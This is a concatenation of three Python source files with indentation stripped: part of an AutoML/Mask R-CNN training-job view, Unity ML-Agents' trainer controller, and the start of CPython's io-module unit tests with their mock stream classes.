'createdOn': str(datetime.datetime.now()),
'newPMMLFileName': newPMMLFileName.split('/')[-1]
}
tempRunMemory['taskName']=data_details['taskName']
print ('>>>>>>>>>>>>>>>>>>>>AutoML',tempRunMemory)
RUNNING_TASK_MEMORY.append(tempRunMemory)
# print ('RUNNING_TASK_MEMORY >>>>>>>>>',RUNNING_TASK_MEMORY)
return JsonResponse(data_details,status=202)
def statusOfModel(idforData):
try:
projectName=idforData
# print ('STep 1')
data_details=autoMLutilities.readStatusFile(projectName)
# print ('STep 2')
data_details['generationInfo']=autoMLutilities.progressOfModel(logFolder,projectName)
# print ('STep 3')
except:
projectName=idforData
# print ('STep 1')
data_details=autoMLutilities.readStatusFile(projectName)
# print ('STep 2')
# print ('MMMMMMMMMMMM',data_details)
# for j in data_details:
# print (j,type(data_details[j]))
return JsonResponse(data_details,status=200)
def trainMRCNN(userInput):
# userInput=requests.body
# userInput=json.loads(userInput)
# print (userInput)
pmmlFile=userInput['filePath']
try:
dataFolder=userInput['dataFolder']
except:
print ('Get Data folder')
try:
tensorboardLogFolder=userInput['tensorboardLogFolder']
except:
tensorboardLogFolder=target_path='./logs/'+''.join(choice(ascii_uppercase) for i in range(12))+'/'
# print ('tensorboardLogFolder',tensorboardLogFolder)
kerasUtilities.checkCreatePath(tensorboardLogFolder)
# batchSize=userInput['batchSize']
epoch=userInput['epoch']
stepsPerEpoch=userInput['stepPerEpoch']
# learningRate=userInput['learningRate']
try:
tensorboardUrl=userInput['tensorboardUrl']
except:
tensorboardUrl=''
# idforData=pmmlFile.split('/')[-1].replace('.pmml','')
idforData=os.path.basename(pmmlFile).replace('.pmml','')+'_MRCNN'
saveStatus=logFolder+idforData+'/'
kerasUtilities.checkCreatePath(saveStatus)
statusfileLocation=saveStatus+'status.txt'
# print("status file generated")
data_details={}
data_details['pmmlFile']=idforData
data_details['dataFolder']=dataFolder
data_details['fileName']=pmmlFile
data_details['tensorboardLogFolder']=tensorboardLogFolder
data_details['tensorboardUrl']=tensorboardUrl
# data_details['batchSize']=batchSize
data_details['epoch']=epoch
data_details['stepsPerEpoch']=stepsPerEpoch
# data_details['learningRate']=learningRate
data_details['idforData']=idforData
data_details['status']='Building Architecture'
with open(statusfileLocation,'w') as filetosave:
json.dump(data_details, filetosave)
objtrainer = trainMaskRCNN.ObjectDetetctionModels()
prc = Process(target=objtrainer.train, args=(pmmlFile,dataFolder,statusfileLocation,idforData,epoch,\
tensorboardLogFolder,stepsPerEpoch))
prc.start()
pID = prc.ident
data_details['pID']=str(pID)
if pID == -1:
kerasUtilities.updateStatusOfTraining(statusfileLocation,'Training Failed')
else:
with open(statusfileLocation,'w') as filetosave:
json.dump(data_details, filetosave)
runTemp=[i['idforData'] for i in RUNNING_TASK_MEMORY]
if data_details['idforData'] not in runTemp:
# print ('PPPPPPPPPPPPPPPPPPPP Saved to runningTask')
tempRunMemory={'idforData': idforData,
'status': 'Training Failed' if pID==-1 else 'In Progress',
'createdOn': str(datetime.datetime.now()),
'type': 'ObjectDetectionProject',
'pid':pID,
'newPMMLFileName':idforData+'.pmml'}
tempRunMemory['taskName']=tempRunMemory['newPMMLFileName']
RUNNING_TASK_MEMORY.append(tempRunMemory)
else:
pass
return JsonResponse(data_details,status=202)
|
trainer_controller.py
|
# # Unity ML-Agents Toolkit
# ## ML-Agent Learning
"""Launches trainers for each External Brains in a Unity Environment."""
import os
import threading
from typing import Dict, Optional, Set, List
from collections import defaultdict
import numpy as np
from mlagents.tf_utils import tf
from mlagents_envs.logging_util import get_logger
from mlagents.trainers.env_manager import EnvManager
from mlagents_envs.exception import (
UnityEnvironmentException,
UnityCommunicationException,
UnityCommunicatorStoppedException,
)
from mlagents.trainers.sampler_class import SamplerManager
from mlagents_envs.timers import (
hierarchical_timer,
timed,
get_timer_stack_for_thread,
merge_gauges,
)
from mlagents.trainers.trainer import Trainer
from mlagents.trainers.meta_curriculum import MetaCurriculum
from mlagents.trainers.trainer_util import TrainerFactory
from mlagents.trainers.behavior_id_utils import BehaviorIdentifiers
from mlagents.trainers.agent_processor import AgentManager
from mlagents.trainers.settings import CurriculumSettings
class TrainerController(object):
def __init__(
self,
trainer_factory: TrainerFactory,
output_path: str,
run_id: str,
save_freq: int,
meta_curriculum: Optional[MetaCurriculum],
train: bool,
training_seed: int,
sampler_manager: SamplerManager,
resampling_interval: Optional[int],
):
"""
        :param trainer_factory: Factory used to generate a Trainer for each brain.
        :param output_path: Path to save the model.
        :param run_id: The sub-directory name for model and summary statistics.
        :param save_freq: Frequency (in steps) at which to save the model.
        :param meta_curriculum: MetaCurriculum object which stores information about all curricula.
        :param train: Whether to train the model, or only run inference.
        :param training_seed: Seed to use for NumPy and TensorFlow random number generation.
        :param sampler_manager: SamplerManager object that handles samplers for resampling the reset parameters.
        :param resampling_interval: Number of simulation steps after which reset parameters are resampled.
"""
self.trainers: Dict[str, Trainer] = {}
self.brain_name_to_identifier: Dict[str, Set] = defaultdict(set)
self.trainer_factory = trainer_factory
self.output_path = output_path
self.logger = get_logger(__name__)
self.run_id = run_id
self.save_freq = save_freq
self.train_model = train
self.meta_curriculum = meta_curriculum
self.sampler_manager = sampler_manager
self.resampling_interval = resampling_interval
self.ghost_controller = self.trainer_factory.ghost_controller
self.trainer_threads: List[threading.Thread] = []
self.kill_trainers = False
np.random.seed(training_seed)
tf.set_random_seed(training_seed)
def _get_measure_vals(self):
brain_names_to_measure_vals = {}
if self.meta_curriculum:
for (
brain_name,
curriculum,
) in self.meta_curriculum.brains_to_curricula.items():
# Skip brains that are in the metacurriculum but no trainer yet.
if brain_name not in self.trainers:
continue
if curriculum.measure == CurriculumSettings.MeasureType.PROGRESS:
measure_val = self.trainers[brain_name].get_step / float(
self.trainers[brain_name].get_max_steps
)
brain_names_to_measure_vals[brain_name] = measure_val
elif curriculum.measure == CurriculumSettings.MeasureType.REWARD:
measure_val = np.mean(self.trainers[brain_name].reward_buffer)
brain_names_to_measure_vals[brain_name] = measure_val
else:
for brain_name, trainer in self.trainers.items():
measure_val = np.mean(trainer.reward_buffer)
brain_names_to_measure_vals[brain_name] = measure_val
return brain_names_to_measure_vals
@timed
def _save_model(self):
"""
Saves current model to checkpoint folder.
"""
for brain_name in self.trainers.keys():
for name_behavior_id in self.brain_name_to_identifier[brain_name]:
self.trainers[brain_name].save_model(name_behavior_id)
self.logger.info("Saved Model")
def _save_model_when_interrupted(self):
self.logger.info(
"Learning was interrupted. Please wait while the graph is generated."
)
self._save_model()
def _export_graph(self):
"""
Exports latest saved models to .nn format for Unity embedding.
"""
for brain_name in self.trainers.keys():
for name_behavior_id in self.brain_name_to_identifier[brain_name]:
self.trainers[brain_name].export_model(name_behavior_id)
@staticmethod
def _create_output_path(output_path):
try:
if not os.path.exists(output_path):
os.makedirs(output_path)
except Exception:
raise UnityEnvironmentException(
f"The folder {output_path} containing the "
"generated model could not be "
"accessed. Please make sure the "
"permissions are set correctly."
)
@timed
def _reset_env(self, env: EnvManager) -> None:
"""Resets the environment.
Returns:
A Data structure corresponding to the initial reset state of the
environment.
"""
sampled_reset_param = self.sampler_manager.sample_all()
new_meta_curriculum_config = (
self.meta_curriculum.get_config() if self.meta_curriculum else {}
)
sampled_reset_param.update(new_meta_curriculum_config)
env.reset(config=sampled_reset_param)
def _should_save_model(self, global_step: int) -> bool:
return (
global_step % self.save_freq == 0 and global_step != 0 and self.train_model
)
def _not_done_training(self) -> bool:
return (
any(t.should_still_train for t in self.trainers.values())
or not self.train_model
) or len(self.trainers) == 0
def _create_trainer_and_manager(
self, env_manager: EnvManager, name_behavior_id: str
) -> None:
parsed_behavior_id = BehaviorIdentifiers.from_name_behavior_id(name_behavior_id)
brain_name = parsed_behavior_id.brain_name
trainerthread = None
try:
trainer = self.trainers[brain_name]
except KeyError:
trainer = self.trainer_factory.generate(brain_name)
self.trainers[brain_name] = trainer
if trainer.threaded:
# Only create trainer thread for new trainers
trainerthread = threading.Thread(
target=self.trainer_update_func, args=(trainer,), daemon=True
)
self.trainer_threads.append(trainerthread)
policy = trainer.create_policy(
parsed_behavior_id, env_manager.external_brains[name_behavior_id]
)
trainer.add_policy(parsed_behavior_id, policy)
agent_manager = AgentManager(
policy,
name_behavior_id,
trainer.stats_reporter,
trainer.parameters.time_horizon,
threaded=trainer.threaded,
)
env_manager.set_agent_manager(name_behavior_id, agent_manager)
env_manager.set_policy(name_behavior_id, policy)
self.brain_name_to_identifier[brain_name].add(name_behavior_id)
trainer.publish_policy_queue(agent_manager.policy_queue)
trainer.subscribe_trajectory_queue(agent_manager.trajectory_queue)
# Only start new trainers
if trainerthread is not None:
trainerthread.start()
def _create_trainers_and_managers(
self, env_manager: EnvManager, behavior_ids: Set[str]
) -> None:
for behavior_id in behavior_ids:
self._create_trainer_and_manager(env_manager, behavior_id)
@timed
def start_learning(self, env_manager: EnvManager) -> None:
self._create_output_path(self.output_path)
tf.reset_default_graph()
global_step = 0
last_brain_behavior_ids: Set[str] = set()
try:
# Initial reset
self._reset_env(env_manager)
while self._not_done_training():
external_brain_behavior_ids = set(env_manager.external_brains.keys())
new_behavior_ids = external_brain_behavior_ids - last_brain_behavior_ids
self._create_trainers_and_managers(env_manager, new_behavior_ids)
last_brain_behavior_ids = external_brain_behavior_ids
n_steps = self.advance(env_manager)
for _ in range(n_steps):
global_step += 1
self.reset_env_if_ready(env_manager, global_step)
if self._should_save_model(global_step):
self._save_model()
# Stop advancing trainers
self.join_threads()
# Final save Tensorflow model
if global_step != 0 and self.train_model:
self._save_model()
except (
KeyboardInterrupt,
UnityCommunicationException,
UnityEnvironmentException,
UnityCommunicatorStoppedException,
) as ex:
self.join_threads()
if self.train_model:
self._save_model_when_interrupted()
if isinstance(ex, KeyboardInterrupt) or isinstance(
ex, UnityCommunicatorStoppedException
):
pass
else:
# If the environment failed, we want to make sure to raise
                # the exception so we exit the process with a return code of 1.
raise ex
finally:
if self.train_model:
self._export_graph()
def end_trainer_episodes(
self, env: EnvManager, lessons_incremented: Dict[str, bool]
) -> None:
self._reset_env(env)
# Reward buffers reset takes place only for curriculum learning
# else no reset.
for trainer in self.trainers.values():
trainer.end_episode()
for brain_name, changed in lessons_incremented.items():
if changed:
self.trainers[brain_name].reward_buffer.clear()
def reset_env_if_ready(self, env: EnvManager, steps: int) -> None:
if self.meta_curriculum:
# Get the sizes of the reward buffers.
reward_buff_sizes = {
k: len(t.reward_buffer) for (k, t) in self.trainers.items()
}
# Attempt to increment the lessons of the brains who
# were ready.
lessons_incremented = self.meta_curriculum.increment_lessons(
self._get_measure_vals(), reward_buff_sizes=reward_buff_sizes
)
else:
lessons_incremented = {}
# If any lessons were incremented or the environment is
# ready to be reset
meta_curriculum_reset = any(lessons_incremented.values())
# Check if we are performing generalization training and we have finished the
# specified number of steps for the lesson
generalization_reset = (
not self.sampler_manager.is_empty()
and (steps != 0)
and (self.resampling_interval)
and (steps % self.resampling_interval == 0)
)
ghost_controller_reset = self.ghost_controller.should_reset()
if meta_curriculum_reset or generalization_reset or ghost_controller_reset:
self.end_trainer_episodes(env, lessons_incremented)
@timed
def advance(self, env: EnvManager) -> int:
# Get steps
with hierarchical_timer("env_step"):
num_steps = env.advance()
# Report current lesson
if self.meta_curriculum:
for brain_name, curr in self.meta_curriculum.brains_to_curricula.items():
if brain_name in self.trainers:
self.trainers[brain_name].stats_reporter.set_stat(
"Environment/Lesson", curr.lesson_num
)
for trainer in self.trainers.values():
if not trainer.threaded:
with hierarchical_timer("trainer_advance"):
trainer.advance()
return num_steps
def join_threads(self, timeout_seconds: float = 1.0) -> None:
"""
Wait for threads to finish, and merge their timer information into the main thread.
:param timeout_seconds:
:return:
"""
self.kill_trainers = True
for t in self.trainer_threads:
try:
t.join(timeout_seconds)
except Exception:
pass
with hierarchical_timer("trainer_threads") as main_timer_node:
for trainer_thread in self.trainer_threads:
thread_timer_stack = get_timer_stack_for_thread(trainer_thread)
if thread_timer_stack:
main_timer_node.merge(
thread_timer_stack.root,
root_name="thread_root",
is_parallel=True,
)
merge_gauges(thread_timer_stack.gauges)
def trainer_update_func(self, trainer: Trainer) -> None:
while not self.kill_trainers:
with hierarchical_timer("trainer_advance"):
trainer.advance()
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import sysconfig
import textwrap
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import (
assert_python_ok, assert_python_failure, run_python_until_end)
from test.support import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
_cflags = sysconfig.get_config_var('CFLAGS') or ''
_config_args = sysconfig.get_config_var('CONFIG_ARGS') or ''
MEMORY_SANITIZER = (
'-fsanitize=memory' in _cflags or
'--with-memory-sanitizer' in _config_args
)
ADDRESS_SANITIZER = (
'-fsanitize=address' in _cflags
)
# Does io.IOBase finalizer log the exception if the close() method fails?
# The exception is ignored silently by default in release build.
IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence=0):
# naive implementation, enough for tests
return 0
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
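# Generic tests run against both implementations; attributes such as self.open,
# self.FileIO and the mock classes above are presumably bound to either the C (io)
# or pure-Python (_pyio) versions elsewhere in the test module.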
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
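# truncate() does not move the stream position, so tell() still reports 5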
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
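# Ability flags used below: 'f' = backed by a real file descriptor, 'r' = readable,
# 'w' = writable, 's' = seekable.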
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and macOS this test consumes large resources; it takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space,
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
